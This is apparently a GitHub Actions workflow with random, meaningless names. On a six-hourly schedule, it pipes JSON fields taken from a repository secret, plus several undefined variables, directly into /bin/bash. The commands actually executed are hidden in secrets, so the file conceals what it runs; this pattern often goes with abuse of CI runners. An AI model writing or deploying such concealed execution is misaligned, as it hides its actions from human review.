name: careenmutter

on:
  workflow_dispatch:
  schedule:
    - cron: '11 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: careenmutter
        env:
          b58202: ${{ secrets.b58202 }}
        run: |
          echo $b58202 | jq -r .ni904 | /bin/bash
          echo $bjkjh1213 | jq -r .lsv6 | /bin/bash
          echo $qm7 | jq -r .pzrm485 | /bin/bash
          echo $baynh89108 | jq -r .f10 | /bin/bash
          echo $erm46 | jq -r .ey5 | /bin/bash

